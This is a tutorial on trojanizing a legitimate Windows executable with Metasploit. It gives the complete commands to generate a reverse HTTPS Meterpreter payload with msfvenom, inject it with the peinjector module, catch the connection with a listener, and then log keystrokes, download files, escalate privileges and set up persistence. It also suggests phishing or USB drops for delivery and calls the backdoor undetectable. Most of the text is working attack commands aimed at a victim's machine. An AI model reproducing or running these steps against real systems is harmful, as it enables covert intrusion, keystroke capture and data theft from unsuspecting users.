Metasploit: Injecting a Payload into an Windows Executable for Backdoor Access

Introduction:

Metasploit is one of the most powerful tools in the arsenal of a penetration tester. Its capability to automate attacks, exploit vulnerabilities, and provide a reliable framework for post-exploitation activities is unparalleled. Among its many features, one advanced technique that stands out is the ability to inject a payload into a legitimate executable file. This method enables attackers to create backdoors within trusted applications, allowing them to maintain stealthy and persistent access to compromised systems.

In this article, we will explore the process of injecting a payload into a legitimate executable, focusing on the usage of Metasploit's peinjector module. We will cover everything from payload generation to exploiting the system and executing post-exploitation commands, ensuring the reader gains a comprehensive understanding of each step in the process.

Table of Contents:

• Lab Setup
• Generating the Payload with msfvenom
• Uploading the Executable to the Victim’s System
• Injecting the Payload using the peinjector Module
• Establishing Meterpreter Access
• Post-Exploitation Techniques
• Conclusion

1. Lab Setup

To begin, ensure that you have the following environment set up:

• Attacker Machine (Pentesting Machine): A machine running Kali Linux or any other platform equipped with Metasploit.
• Victim Machine (Target Machine): A Windows 10 or any Windows-based machine, which will serve as the target for the exploit.

Ensure both systems are on the same network or are otherwise able to communicate for the reverse shell to be effective.

Required Tools:

• Metasploit Framework: The backbone of the attack.
• msfvenom: A powerful payload generator that creates custom executables.
• peinjector Module: Used to inject payloads into legitimate executables.

2. Generating the Payload with msfvenom

The first step is generating the payload that will be injected into the executable. In our case, we will generate a reverse HTTPS Meterpreter shell, which is designed to connect back to the attacker’s machine when executed by the victim.

To generate the payload using msfvenom, run the following command on your attacker machine:

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.2 LPORT=443 -f exe -o payload.exe

Let’s break down the components of this command:

• -p windows/meterpreter/reverse_https: Specifies the payload type. In this case, a Meterpreter reverse HTTPS payload designed for Windows.
• LHOST=192.168.1.2: This is the attacker's IP address. The victim machine will attempt to connect to this IP for the reverse shell.
• LPORT=443: The port number on which the attacker will listen for incoming connections from the victim.
• -f exe: Specifies that the payload should be generated as a Windows executable file.
• -o payload.exe: Output file name for the generated payload.

After running this command, a file named payload.exe will be created on your machine. This file is the malicious payload, which will be injected into a legitimate application.

3. Uploading the Executable to the Victim’s System

With the payload generated, we now need to upload a commonly used executable to the victim machine. This executable should appear innocent to the user to maximize the likelihood of the victim running it without suspicion.

For the sake of this tutorial, let’s assume the victim’s machine has downloaded a common application executable, someapp.exe, which is located in the victim's Downloads folder. In a real-world attack, you might upload the executable via social engineering tactics, phishing, or a file transfer method like SMB, RDP, or through a malicious USB.

Once the file is uploaded to the victim’s system, ensure that the path to the executable is noted, as this will be required when performing the payload injection.

4. Injecting the Payload using the peinjector Module

The next step is to inject the malicious payload into the legitimate executable. We will use Metasploit’s peinjector module for this process. The peinjector module is specifically designed to inject a payload into an existing Portable Executable (PE) file, such as .exe files, without altering the outward appearance of the file.

Here’s the step-by-step guide for using the peinjector module:

1. Start Metasploit: Launch the Metasploit framework on your attacker machine.

   msfconsole

2. Select the peinjector module: Use the post/windows/manage/peinjector module, which handles payload injection.

   msf6 > use post/windows/manage/peinjector

3. Set the target executable: Specify the path to the legitimate executable file that you want to inject the payload into. This is the file located on the victim's system.

   msf6 post(windows/manage/peinjector) > set targetpe C:\\Users\\Geek-Institute\\Downloads\\someapp.exe

4. Set the session ID: This is the active Meterpreter session through which the attack will be executed.

   msf6 post(windows/manage/peinjector) > set session 1

5. Configure LHOST and LPORT: These values correspond to the attacker’s IP address and port number, which were used during the payload generation.

   msf6 post(windows/manage/peinjector) > set lhost 192.168.1.2

   msf6 post(windows/manage/peinjector) > set lport 443

6. Inject the payload: Finally, execute the module to inject the payload into the target executable.

   msf6 post(windows/manage/peinjector) > exploit

5. Establishing Meterpreter Access

Once the payload has been injected, it’s time to establish a listener on the attacker’s machine to handle the reverse connection initiated by the victim when they execute the modified executable.

1. Set up the multi/handler: The multi/handler module in Metasploit is used to handle incoming connections from the victim's machine.

   msf6 > use exploit/multi/handler

2. Configure the payload: Set the payload type to match the one used earlier (windows/meterpreter/reverse_https).

   msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_https

3. Set the LHOST and LPORT: Use the same IP address and port that were used during payload generation and injection.

   msf6 exploit(multi/handler) > set lhost 192.168.1.2

   msf6 exploit(multi/handler) > set lport 443

4. Start the listener: Finally, initiate the listener to await the incoming connection from the victim’s machine.

   msf6 exploit(multi/handler) > exploit

6. Post-Exploitation Techniques

With a Meterpreter session open, you now have full control over the victim's system. Below are some of the most commonly used post-exploitation commands in Meterpreter.

• System Information: Use the sysinfo command to gather basic system information about the victim's machine.

  meterpreter > sysinfo

• User Information: Check the currently logged-in user with the getuid command.

  meterpreter > getuid

• Running Processes: List all running processes on the victim machine, useful for finding active applications or services.

  meterpreter > ps

• Keylogging: Start keylogging to capture keystrokes typed by the victim.

  meterpreter > run post/windows/capture/keyboard

• File Upload/Download:
  • Upload a file to the victim’s machine:

    meterpreter > upload /path/to/local/file C:\\Users\\Geek-Institute\\Desktop

  • Download a file from the victim’s machine:

    meterpreter > download C:\\Users\\Geek-Institute\\Documents\\important_file.txt

• Privilege Escalation: Attempt to elevate your privileges on the victim’s system using the getsystem command.

  meterpreter > getsystem

• Persistence: Set up persistence to ensure that you retain access to the victim’s system even after a reboot.

  meterpreter > run persistence -U -X -p 443 -r 192.168.1.2

7. Conclusion

Injecting a payload into a legitimate executable is a highly effective technique for penetration testers and attackers seeking to maintain persistent and undetectable access to a target system. Through the use of Metasploit’s msfvenom for payload creation and the peinjector module for payload injection, we demonstrated how to craft a sophisticated attack that remains hidden under the guise of a trusted application.